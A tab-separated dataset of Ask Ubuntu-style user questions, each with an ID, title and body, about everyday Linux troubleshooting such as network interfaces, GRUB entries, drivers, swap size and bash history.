437561	control which network interface is used by default	my mainboard hast two ethernet ports so far i have only used one ( eth1 ) , which is connected to a router with a dhcp-server . however , i want to use the other port ( eth0 ) simultaneously to connect to another wlan router . the desktop is supposed to act as a hub , i.e . forward the dhcp services and all packages to the wlan , while still being a client in the network itsself . is there any tutorial on this topic ? ( i could n't find anything useful on google ) so far i am using a static ip setup for the wlan router ( eth0 ) . as soon as i simply plug in the cable and connect with the network-manager , the internet connection is lost ( even though the network manager shows , that both networks are connected ) . it appears that by default eth0 is then used for communication . using firefox or any piece of software , ( how ) can i control which network interface is used individually and by default ?
437563	unable to load page using express from local machine	im developing a webpage using express framework in ubuntu . the machine i am developing on can access the webpage just fine at 192.168.1.37:3000 or localhost:3000 , but i ca n't get other machines on the local network to see the page using the local ip adress . looking at the headers , it seems that no response is received from the web server . output from sudo netstat -tulpn regarding node.js : proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:3000 0.0.0.0 : * listen 3934/node any suggestions ? thanks ! update : i just enabled port forwarding on my router ( port 3000 ) to my development machine , and i can now access the website at http : //external.ip.adress:3000 , but the local machines still can not acces the page through the local ip adress . i 'm confused : s
437564	editing 40_custom outputs an error	i edited the 40_custom file so i can boot linux iso 's from a different partition but when i run sudo update-grub from the terminal , i get this : '' /usr/sbin/grub-mkconfig : 262 : usr/sbin/grub-mkconfig : /etc/grub.d/40_custom : not found '' . i know it 's there because i was just editing the file . here is the contents of the 40_custom file : '' # ! /bin/sh exec tail -n +3 $ 0 menuentry `` ubuntu 13.10 desktop amd64 '' { set isofile= '' /ubuntu-13.10-desktop-amd64 '' insmod part_gpt loopback loop ( hd0,2 ) $ isofile linux ( loop ) /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper iso-scan/filename= $ isofile nomodeset initrd ( loop ) /casper/initrd.lz } ` and here 's the files in the grub.d directory : 00_header 05_debian_theme 10_linux 20_linux_xen 20_memtest86+ 30_os-prober 30_uefi-firmware 40_custom 41_custom readme
437569	what is wine doing when it says , `` the wine configuration in /home/user/.wine is being updated , please wait ... '' ?	when i am using wine or changing its preferences , i often get a pop-up that says , `` the wine configuration in /home/user/.wine is being updated , please wait ... '' it stays there for a minute or two , and then disappears and whatever i wanted to do happens . internet searches for this dialog box have only pulled up bug reports , and never an explanation of what is going on . what `` configuration '' is wine updating , and why does it have to do it so often ?
437571	using vpn on ubuntu - incorrect location / turkish government blocked twitter	i 'm using zenmate chrome extention for vpn service . my real location is turkey and my public ( virtual ) location is germany . when i use http : //www.rapidtables.com/tools/where-am-i.htm to learn my location it show my real location ( turkey ) not the vpn location . as far as i know it must show vpn 's location . why it goes to my real location ? any idea ? maybe you know , twitter is blocked in turkey so many citizens use vpn to reach twitter . can government decide where i 'm if i use vpn ?
437572	ubuntu phone on galaxy s3	can i install ubuntu touch on my phone ? my phone is galaxy s3 .
437578	sound input/output w/ mudita24 and delta 1010lt	i have a fresh install of ubuntu 12.04 lts ( 64-bit ) with an m-audio delta 1010lt soundcard . i installed mudita24 which allowed me to hear system sounds and applications once i turned up the dac volumes in the analog volume tab . my problem is this : i can not seem to get ubuntu ( pulseaudio ) to recognise my inputs , i have the adc faders turned up in mudita24 and i can even see the input volume when i speak into the mic ( on monitor inputs tab ) but there does n't seem to be a way to select which input i want to use . in the pulse audio input options i just get a choice of analog input or iec958-stereo-input both with the subheading : ice172 [ envy24 ] pci multi-channel i/o controller . i do n't know if anyone has experience of this , my mic is going into h/w input 3 in the delta1010lt , i 'm trying to get teamspeak working .
437580	help with partitions	i recently dual booted windows and ubuntu , giving ubuntu 150gb of my 500gb hard drive . i have uninstalled all of the programs that work on linux from my windows and then reinstalled them on my ubuntu , giving me 222gb free on my windows partition , and no free room on my ubuntu partition . i would like to transfer those 200gb from my windows partition to my ubuntu partition , but i can not figure out how to do it . here is a screenshot of my gparted . i would greatly appreciate help , because i am planning on switching to mainly ubuntu .
437584	xkbcomp command at startup using .xinitrc	how do i install my custom keyboard map and have it start automatically at startup ? the following command works when i run it in a terminal : xkbcomp -i $ home/.xkb/ $ home/.xkb/switch-lalt-lctl.xkb $ display but when i put this into .xinitrc ( linked from .xsession just in case ) , the command is not run . what am i missing ? i 've spent hours / days searching and trying other 'solutions ' but none of these work for me . thanks in advance for any help or ideas you may have .
437586	how to make wireless mouse detectable ? ( logitech m185 )	i already try to move it to another usb port but still doesnt work . http : //www.logitech.com/en-gb/product/wireless-mouse-m185 im new at ubuntu , is there anyone who can show me how to make this work ? should i install the driver ? but i dont know how : p
437587	eclipse missing menus when starting from cli	i 'm a new ubuntu user . over the past weeks i installed ubuntu 13.10 and the latest eclipse kepler ide , plus the workbench plugin from libre ada for the gnat system . i 'm using ubuntu either locally on the machine it is installed or through an x11 terminal from my windows machine . today , after installing all the latest updates ubuntu reported to me i noticed a strange behavior . when i start eclipse locally through the command line , none of the top menus show up , files , edit , project , whatever they all just show a thin black bar and nothing else . i also have an eclipse icon in the startup bar on the left of the desktop and when i use that , eclipse shows all menus . when i start eclipse through the remote x11 terminal session using the command line there , the menus show up as well . of course they look differently there using another display manager i assume . also , when i close eclipse i get a whole bunch of error messages on the console . i include a section here as a sample because the list is really long [ prj_normalize ] 1/3 normalize : imported=empty ( 18:27:37.120 ) [ prj_normalize ] 2/4 done normalizing empty ( 18:27:37.120 ) [ entities.assert ] 1/14 reset entities database ( 18:27:37.138 ) getbuffer file=/home/patric/workspace/common_library/simple_tcp_server/src/main.adb returned from editor buffer 105 bytes getbuffer file=/home/patric/workspace/common_library/simple_tcp_server/src/main.adb returned from editor buffer 105 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-rbtgbo.ads returned from file 6858 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-rbtgbo.ads returned from file 6858 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-lfwtio.ads returned from file 1216 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-lfwtio.ads returned from file 1216 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-suenco.adb returned from file 12914 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-suenco.adb returned from file 12914 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-stache.ads returned from file 4468 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-stache.ads returned from file 4468 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-pack15.adb returned from file 4846 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-pack15.adb returned from file 4846 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/g-awk.ads returned from file 26770 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/g-awk.ads returned from file 26770 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-chtgbk.ads returned from file 5123 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-chtgbk.ads returned from file 5123 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-stunau.adb returned from file 3043 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-stunau.adb returned from file 3043 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-chahan.adb returned from file 18829 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-chahan.adb returned from file 18829 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/g-sestin.ads returned from file 3241 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/g-sestin.ads returned from file 3241 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-vallld.adb returned from file 3493 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-vallld.adb returned from file 3493 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-pack25.adb returned from file 4848 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-pack25.adb returned from file 4848 bytes ... ... . getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-textio.ads returned from file 18917 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/a-textio.ads returned from file 18917 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-stchop.ads returned from file 4648 bytes getbuffer file=/usr/lib/gcc/x86_64-linux-gnu/4.6/rts-native/adainclude/s-stchop.ads returned from file 4648 bytes [ build_configurations ] 1/29 trace-creating target 'check syntax ' ( 18:27:48.875 ) [ build_configurations ] 2/30 trace-creating target 'check semantic ' ( 18:27:48.875 ) [ build_configurations ] 3/31 trace-creating target 'compile file ' ( 18:27:48.875 ) [ build_configurations ] 4/32 trace-creating target 'build main ' ( 18:27:48.875 ) [ build_configurations ] 5/33 trace-creating target 'build all ' ( 18:27:48.875 ) [ build_configurations ] 6/34 trace-creating target 'compile all sources ' ( 18:27:48.875 ) [ build_configurations ] 7/35 trace-creating target 'build < current file > ' ( 18:27:48.875 ) [ build_configurations ] 8/36 trace-creating target 'clean all ' ( 18:27:48.875 ) [ build_configurations ] 9/37 trace-creating target 'clean root ' ( 18:27:48.875 ) [ build_configurations ] 10/38 trace-creating target 'clean project ' ( 18:27:48.875 ) [ build_configurations ] 11/39 trace-creating target 'run main ' ( 18:27:48.875 ) [ build_configurations ] 12/40 trace-creating target 'custom ... ' ( 18:27:48.875 ) [ build_configurations ] 13/41 trace-creating target 'custom build ... ' ( 18:27:48.876 ) any help on this would be appreciated .
437592	how to prevent logs from getting too big ?	i have a cronjob that runs some python scripts and they generate massive log file . how do i prevent them from getting so big ? it 'd be perfect if the file was deleted once it hit a certain size . because every few days , the file is 50mb now but gets much bigger and takes forever to download and analyze a bug on a slow internet connection . i really only want to see that last 1000 lines to see where the script went wrong . i know i could code something to do this , but i was just wondering if linux had something that i did n't know about . i imagine big log files are a common problem . thank-you .
437593	how to integrate jframe menu bar into unity top bar ?	i 'm developing a java application using jframes , and the menu bar object does n't integrate with unity 's top bar ( window title & application menus ) as any native unity application does . is there a way to do it ? my app : firefox integration : ( what i want to )
437594	system settings icons missing with numix utouch	i am using the numix utouch icon theme , some of the icons on system settings are not replaced . this is how it should look . currently on 14.04 ...
437596	problems remapping right shift in 12.10	when i use xmodmap -e `` keycode 62 = alt_l '' the command succeeds , but the shift key remains a shift key . when i attempt to map alt_l to other keys , the command succeeds and the key is successfully remapped to alt . my .xmodmap file claims that shift_r is assigned to alt_l , but this is not true , and outside of the terminal my shift is completely broken . what is happening here ? ubuntu 12.10
437599	install nltk 3.0 - which folder	i just installed python 3.4.0 on ubuntu 13.10 , and now i want to install nltk-3.0a3.tar.gz however , i am not sure to which folder i should extract this . i am still new to linux and i do n't know where to find my python 3.4 installation ! any help appreciated !
437601	remove ubuntu opton from boot manager	i have windows 7 as base operating system , and i have installed ubuntu 13.10 on it.after some days my windows 7 get corrupted & i installed another window 7 but when i am starting the computer there is still an option for ubuntu ( boot manager ) , when i select it is not working ( obviously due to data loss ) as i installed ubuntu in partition in which window 7 is present if i format the c ( drive ) as usual all data will be lost & i lost ubuntu also but the problem is that option how can i trouble shoot that problem , so please tell me how to remove the option for it to install another copy of ubuntu . thank you in anticipation .
437602	how to upgrade to the latest version from my current ubuntu version 11.10 without data loss	how can i upgrade to the latest ubuntu version from the present version 11.10 on my dell inspiron n5050 laptop without data loss . also inform how can download the latest version .
437604	making cpu online does n't work ( armv71 ) ?	i am trying to turn cpu status to online , but it does n't seem to work . i run this : echo 1 | sudo tee /sys/devices/system/cpu/cpu0/online here is what i get when i run lscpu : architecture : armv7l byte order : little endian cpu ( s ) : 4 on-line cpu ( s ) list : 0 off-line cpu ( s ) list : 1-3 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 1 does anyone know how i can fix this ? i am trying to turn them on so that my parallel applications see all 4 cpus without me having to specify this manually . example ... running pbzip2 now would only run it on a single core , unless i place option with number of cores/threads to use -- pbzip2 -p4 . architecture of this cpu is armnv71 can cpufrequtils have any effect on this ?
437607	change priority ( nice value ) of a program permanently	i am trying to change nice value to ( -20 ) permanently for uget-gtk by using gnome-system-monitor . but when i end process and restart it again , nice value by default got ( 0 ) . is there a way to set nice value to ( -20 ) permanently for uget-gtk .
437612	what stats are listed at the bottom of a default byobu session ?	i recently logged in to my media center via ssh because it was having issues , and noticed at stat at the bottom of my terminal in red with exclamation marks next to it , but can not seem to guess what it is signaling . the 5 stats furthest to the right seem to be number of processors , processor speed , ram ? size , amount of ram in use , date . one over from that appears to be up-time , but i ca n't figure out the rest of the stats . what stats are displayed at the bottom of this byobu system ?
437614	set primary ipv6 address	i 've got a /64 of ipv6 addresses available to one of my servers ( ubuntu 12.04 ) . i 'm binding them like this : auto eth0 iface eth0 inet static address xxx.xxx.xxx.82 netmask 255.255.255.248 network xxx.xxx.xxx.80 broadcast xxx.xxx.xxx.255 gateway xxx.xxx.xxx.81 iface eth0 inet6 static address xxxx : :2 netmask 64 gateway xxxx : :1 pre-up echo 0 > /proc/sys/net/ipv6/conf/eth0/autoconf pre-up echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra pre-up echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra_defrtr pre-up echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra_pinfo pre-up echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra_rtr_pref up /sbin/ifconfig eth0 inet6 add xxxx : :3/64 # ... snip ... up /sbin/ifconfig eth0 inet6 add xxxx : :25/64 this works , but applications are all using xxxx : :25 for their outgoing requests unless specifically told otherwise . if i add xxxx : :26 in my /etc/network/interfaces , they all start using that . it seems like they just use whatever the highest number is . how do i specify a certain address to be used as the default ? in my case , i happen to want to use the lowest address ( xxxx : :2 ) , but i 'd really like to know how to specify a particular one , should the need arise in the future .
437616	i installed dns server in my initial ubuntu server installion how do i uninstall it ?	i installed a dns server in my initiate ubuntu server installation how do i uninstall it ? cause i do n't want it any more and i do n't want it laying around cause i heard the more server services my server has the more it can be exploited or there are more ways it can be exploited .
437617	getting grey hash screen when using rdp into my server	i 've just installed ubuntu server 12.04 - this is my first ever outing with linux ; this may well be a simple question ... . : ) ( on a different note , i love this apt-get stuff ! ) i have installed the server and i wish to rdp into it from my windows machines . i have read some tutorials and with a mixture of xrdp , vnc and some gnome thingy ( gnome classic desktop gui i believe.. ) i finally managed to get it to connect and i can see a nice interface . i have also disabled the desktop interface from loading when the server itself reboots - used the config edits at the bottom of this page to do that . so - my question . if i boot my server up i am prompted to login at the terminal command line . if i log in i can then successfully remote connect from my windows machines . however , if i do not log in then when i rdp i just get a screen covered in grey hash 's . is there a way i can set this up so that i do n't need to log in on the server itself before being able to rdp in ? i suppose i could disable my credentials on the server though that seems counter intuitive . ultimately , should the server ever need rebooting via rdp i do n't want to not be able to rdp back in all because the server has n't had its credentials entered on reboot . i hope this makes sense ... oh ... also to mention.. because i had followed a bunch of different tutorials ( some had parts that worked where other parts failed ) it 's likely that i have entered some command or other that perhaps disabled what would normally be a default behaviour - what i could n't do though is tell you exactly what i have been typing ... thanks in advance .
437620	vmplayer unable to `` open a virtual machine ''	i have installed `` vmplayer '' on my ubuntu 12.04.4 lts . i have created 3 virtual machines on the vmplayer but now after ubuntu update i am having problem while opening a virtual machine in vmplayer . when i start vmplayer i get the vmplayer window with following options : create new virtual machine open virtual machines upgrade help but whenever i go to `` open a virtual machine '' and select a virtual machine nothing happens.vmplayer does not open that virtual machine . it just takes me back to home screen . i tried running vmplayer with sudo and then i was able to open virtual machines . but earlier sudo rights were not needed . what is happening ? how do i solve this problem ? i had a look at /tmp/vmware- < user > /logs but i did n't find any error !
437621	grub menu not showing up at boot	my computer shipped with windows 8 and later i upgraded to windows 8.1 right now i 'm trying to get windows 8.1 to dual boot with ubuntu 12.04 , but the grub menu does n't show up at all . my computer just boots straight to windows . i searched for this online and the only answer i get is to edit /etc/default/grub , but i do n't even know what this is and where to find this . i also ca n't use a bootable cd , only a usb . i really need step-by-step answers that are n't confusing like all the other ones i 've found so far . edit : i just rebooted and now the grub menu does show up but when i try to boot into ubuntu , it says a file is missing . windows boots normally though . i have disabled secure boot and fast startup . windows failed to start . a recent hardware change or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer '' if you do not have this disc , contact your computer administrator or computer manufacturer for assistance . file : \nst\autoneogrub0.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains errors . i 'm not sure if that file was corrupted while installing ubuntu or it 's missing .
437622	app problem loading page	i am using firefox 28.0 and whenever i try to get an app from the software centre by clicking the software centre button it tells me this : firefox does n't know how to open this address , because the protocol ( apt ) is n't associated with any program .
437628	when connected through netextender , work network ca n't be accessed with names	there are already plenty of questions along the same lines , but i do n't see them helping : netextender vpn 6.0 works momentarily then remote hosts timeout -- already updated but does n't fix the issue . how to get netextender ( vpn ) working in ubuntu 12.10 x64 ? -- not really a solution how to get netextender vpn client on ubuntu 13.04 working ? -- i 'm not very sure if i need to go through these steps ( please look below ) disconnecting netextender vpn : no internet -- not a similar problem . in my case , netextender reports connection is successful , here is part of log : connected . logging in ... login successful . failed to retrieve epc agent version ssl connection is ready using ssl encryption cipher 'rc4-sha' using new ppp frame encoding mechanism using ppp async mode ( chosen by server ) connecting tunnel ... client ip address : 1.2.3.4 ( example ) ifconfig reports : ppp0 link encap : point-to-point protocol inet addr:1.2.3.4 p-t-p:192.0.2.1 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1280 metric:1 rx packets:10 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:590 ( 590.0 b ) tx bytes:526 ( 526.0 b ) even though netenxtender says connected , i ca n't access my office vpn . whatismyip reports my isp ip after connecting . i 'm using ubuntu 13.10 ( 32bit ) [ edit ] : ok i talked bit too early . here is actual issue : vpn is connected , i can access all computers with ip addresses but not names , what can be the reason ?
437632	kindly explain me this code of increment decrement operator	following is the code that i run in ubuntu 13.10 . code : - # include < stdio.h > main ( ) { int i=10 , j=10 ; i=i++ + ++j ; printf ( `` i= % d j= % d\n '' , i , j ) ; j=++i + j++ ; printf ( `` i= % d j= % d\n '' , i , j ) ; } output : - i=21 j=11 i=22 j=33 logically , as per rules ans should be : - i=22 j=11 i=23 j=35 and when i run this code in ubuntu 12.10 then i get correct ans i.e . above ans . please explain what is happening ? ?
437635	how to turn off baloo in kde 4.13 ?	i have kubuntu 14.04 and just installed the newest updates . looking at the process list i see baloo indexer running . i could not find a checkbox in baloo settings to turn off the indexing .
437638	how to install autocad 2010 in ubuntu 12.04	i want to install autocad 2010 or any other version on my ubuntu 12.04 lts .i do n't want any other alternatives for this software . please help me , need it urgent .
437639	keyboard and trackpad do not work on wake	i just installed ubuntu 13.10 on my asus 1225b . after having some problems with uefi got it working mostly good . only problem is 1 out of 2 times i wake it ( from suspend ? ) the keyboard and track pad do n't work . i can see the cursor blinking so it 's not frozen . any ideas ? note : i am very good with terminal and am familiar with linux in general .
437640	how to find the login and log out time of every users in in ubuntu ?	i am using ubuntu ltsp i want to find the login and logout time of all users in ubuntu like.. username1 date login_time logout_time username2 date login_time logout_time username3 date login_time logout_time . . .
437641	gaming on ubuntu	ok so i have the 13.10 version and wine 1.6 just was curious if anyone can help me find out how to run the d2bs bot for diablo 2 via wine . any help regarding this matter would be greatly appreciated thanks
437644	i accidentaly did sudo apt-get remove python	i accidentaly did sudo apt-get remove python command and now terminal look has changed , rhythmbox , ubuntu software center and everything is quite changed . i reinstlled python with the command sudo apt-get install python but still nothing reverses . terminal ca n't be opened throug dash but only through ctrl + alt + t how to get back the old ubuntu . ubuntu is still working music is playing videos are being played ( in vlc ) . i can browse net through mozilla . but still how can i reverse the effect ? should i reinstall ubuntu ? i was able to install rhythmbox and software center through uxterminal and then once software center was installed everything was installed and then i install terminal through software center .
437648	not able to install the lastest version of teamviewer on my ubuntu ?	i am having trouble installing latest version of teamviewer . root @ naveena : ~ # sudo dpkg -i teamviewer_linux_x64.deb dpkg : error processing teamviewer_linux_x64.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : teamviewer_linux_x64.deb
437649	wired ethernet connection not detecting	i installed ubuntu 12.04 lts on my desktop but my wired ethernet connection is not being detected at all , while in all other os 's it is . i tried the ifconfig command but there is simply no output when i type it . under the edit connections tab also there is no existing connection displayed under the wired tab .
437650	pressing any physical button/key causes external monitor to shut off	so i 'm pretty new with ubuntu . well linux in general . anyway , whenever i switch to an external display with my laptop ( hp pavilion dv6000 ) and press any key on my keyboard or media control bar , it causes both monitors to go black . i then have to switch back to external display with the default hot-keys ( fn+f4 ) . this has become rather annoying . i thought i fixed the problem at one point , by updating the graphics card to use nvidia drivers , but it did n't actually help . if i press literally any hardware button on my machine , the external monitor will go black , and the laptop monitor will either spazz out or go black as well . any ideas ? if you need further clarification i might post a video link to whats happening . thank you for any help you can give .
437652	how to find the ip-address of the system in ubuntu ltsp ?	i 'm using ubuntu 12.04 ltsp want to find the ipaddress of the system in which a user logins in the format username1 ip address login time username1 ip address login time username1 ip address login time . .
437655	trying to install a wireless driver rt3290 receiving two make errors	i have a new computer , i decided to go for ubuntu instead of other operating systems . however , i can not seem to get my wireless to work . my wireless seems to be picking up other networks ( not my own ) . i 've tried a bunch of fixes , i have landed on this one i do n't even know if i need to use this fix , but i have been trying everything . the problem with this fix is when i follow the steps and type make i get a make error 1 & 2 . i do n't know if the driver is already installed on my machine , since i can pick up other wifi signals , although they are all password blocked so i ca n't check if i can connect to them . this is driving me absolutely nuts . although i guess this is teaching me how to use ubuntu the hard way . if you need specific info to help me let me know and i will provide it .
437656	how-to stop computer locking when lid closes ?	here are my power settings : how do i stop the computer locking when i close the lid ?
437658	group video calling with 32 or 64 bit 12.04 . skype 4.2.0.13 can not send my video to group	i upgraded my skype account to premium to test group calling as i am unable to display my video on group calls using linux . total failure so far . i can connect across my own network but can not receive or send any video . i can receive a group video outside my network but can not send my own video . the video icon is crossed out and is a solid white icon is this feature still working on any linux software of any kind that i can download still ? it does not work on my ipad either . seems like i am forced to buy windows ! ? ? thanks andrew
437661	copying the documents to a new os and removing an old one	i removed many necessary packages from my current os by mistake so that i ca n't boot it normally at the moment . it 's broken . but that 's not the problem as i 've wanted to try other linux distributive lately . but there are the documents in this ( broken ) one i want to save . how do i save them ? i figure i should not overwrite it and install the new one along with it , then when i have the new os installed , go to the old one and copy the documents . but after i 've copied them , will i be able to completely remove that broken os and how ? p.s . i do n't want to repair it , i just want to try something new and compare them .
437665	blender with multiple monitors	i run blender with multiple monitors and each window creates a new icon in my taskbar , in comparison gimp which has multiple windows does not . is there a way to fix this ? i am running kde desktop . i also hide the windows decoration on extra windows , which does not work on blender as when i set one window it sets them all like that .
437666	unable to select any options on installation page no root file system is defined-	i am new to ubuntu . i have read the other `` no root file system defined '' posts , however , i can not find an answer to my question from these discussions . unlike those situations when i am at the installation page stage i am not able to select any option apart from back , quit or install . the computer which i am trying to install this on has a blank hard drive . from my understanding the past owners had windows vista on it but erased everything on it before giving it to me . would anyone be able to suggest steps i can take to install this program into the computer ( in lay person terms ) ? i am able to use ubuntu on the trail verison just fine . thank you
437667	can i access my 2nd hard disk ?	i 've installed ubuntu over windows 7 on my laptop , and did n't think about the second hard disk that it had , which i want to use for storage . now i ca n't find a way to access it . is it possible to add it so i can use it for storage , or is it too late and i would have to reinstall ubuntu ? very new and inexperienced to ubuntu/linux in general , thank you for your help and patience !
437669	ubuntu for pentium 4	can i run ubuntu 12.04 lts smoothly with following specs pentium 4-1.5ghz ram-1gb intel graphic card
437673	ubuntu running very slow on c	i have a ati radeon card and i ca n't find drivers forv . right now my computer will run alright but it 's slow and choppy . driver in use is gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits was working good when i did a install with windows xp still running on pc . i installed ubuntu with a fresh install without windows from a dvd i burnt and now it really slow . graphic card is a radeon 9200 . ca n't find any driers for it . thanks for your help . cpu is 2.6 hz with 1 gig of ram . 160 gig hd .
437674	is there a maximum swap partition size for 12.04 , 64 bit	i am running 64 bit ubuntu 12.04 on hp envy spectre ultrabook , with 4gb of ram . i have been running into problems with python code which uses ram very inefficiently , see e.g . here , causing my code to crash . i have increased the swap partition to 8 gb , but crashes still happen . how far can i take it with resizing my swap ? 16 gb ? 32 gb ? at which point will ubuntu be unable to handle it ? thanks !
437676	what video driver should i download ?	i 'm trying to install the ati drivers for ubuntu . when i run sudo lshw -c video it shows : *-display description : vga compatible controller product : wrestler [ radeon hd 6310 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:41 memory : c0000000-cfffffff ioport : f000 ( size=256 ) memory : feb00000-feb3ffff i try to follow the instructions found here : what is the correct way to install ati catalyst video drivers ( fglrx ) ? but , when i get to http : //support.amd.com/en-us/download it confuses me because i do n't know exactly where to look up for my driver . could somebody help me , please ? i have a laptop , toshiba satellite c660d-16k , running ubuntu 12.04 lts . i do n't know what categories to select . i tried several options but could n't find what i was looking for . or maybe i did found it , but i did n't know it was the right driver . thank you in advance , and sorry for my english .
437677	file dialog : different behaviour for browsing back and forth	i am using ubuntu 13.10 and the gnome shell . my default file manager is nemo , but nautilus is also installed . my problem is that some applications do not support browsing to the parent directory with the `` backspace '' key in the file dialog . i believe that this affects mainly all the gnome applications ( https : //wiki.gnome.org/apps ) . examples for applications with no support : gedit , evince , baobab , brasero , eog , file roller , shotwell . this is very annoying when focussing on using the keyboard only to browse files . are there different applications called for the file dialog ? or is it due to application-specific settings ? thanks in advance
437680	accessing existing windows c drive from ubuntu	i have downloaded ubuntu through windows xo , which i need to stop using . on start-up if i choose ubuntu i ca n't find my existing files which are stored on the hard drive , and it looks as if the file system is empty ( says 77gb free ) . how do i get the information and get rid of windows please ? and if i save any files in ubuntu will it start to overwrite my windows data ? many thanks just seen there is a c : and d : drive in windows . will windows installer have put ubuntu on to the d : drive ? and if so how to find c : from ubuntu . thanks , i am proper novice edit output from sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xaa0213ba device boot start end blocks id system /dev/sda1 63 12594959 6297448+ 12 compaq diagnostics /dev/sda2 * 12594960 161585151 74495096 7 hpfs/ntfs/exfat /dev/sda3 161585152 312578047 75496448 7 hpfs/ntfs/exfat
437682	bash history too short/keeps getting deleted ( possibly does n't survive reboots )	my bash history is working fine , except that it 's too short . histsize and histfilesize are set to 16k , yet i 've only ever seen about 1000 entries in my history file . currently the oldest command in it seems to be about a week old , which roughly coincides with my last reboot . it may be that the history file is n't surviving reboots . ( this particular problem is mentioned in this question , but no solution is given ) some relevant data : .bash_history : -rw -- -- -- - 1 aib aib 10633 mar 22 10:56 /home/aib/.bash_history ( ~700 lines , oldest about a week ago ) .bashrc : histcontrol=ignoreboth shopt -s histappend histsize=16384 histfilesize=16384 nothing in /etc seems to mention .bash_history apart from apparmor ( which i know next to nothing about . ) i run bash from konsole ( kde 's terminal ) and rarely ever use tty1~6 . edit : i 've pinpointed an early entry 's ( # 30 ) date and it 's 10 days . my uptime is 11 days . it 's very likely that my .bash_history file simply does n't survive reboots . edit : i just did a reboot and my history file was preserved . so i ca n't duplicate the problem .
437684	defining and activating my wifi for lenovo b5400 for noob	i 'm really new to ubuntu and really excited about it . i 've bought a lenovo b5400 and installed 12.04 version of ubuntu . checked several forums and could not find the answer for : how to activate my wifi card ? all answers will be appreciated , joe update1 : running lspci | grep network command got : horim @ horim : ~ $ lspci | grep network 04:00.0 network controller : realtek semiconductor co. , ltd. device b723
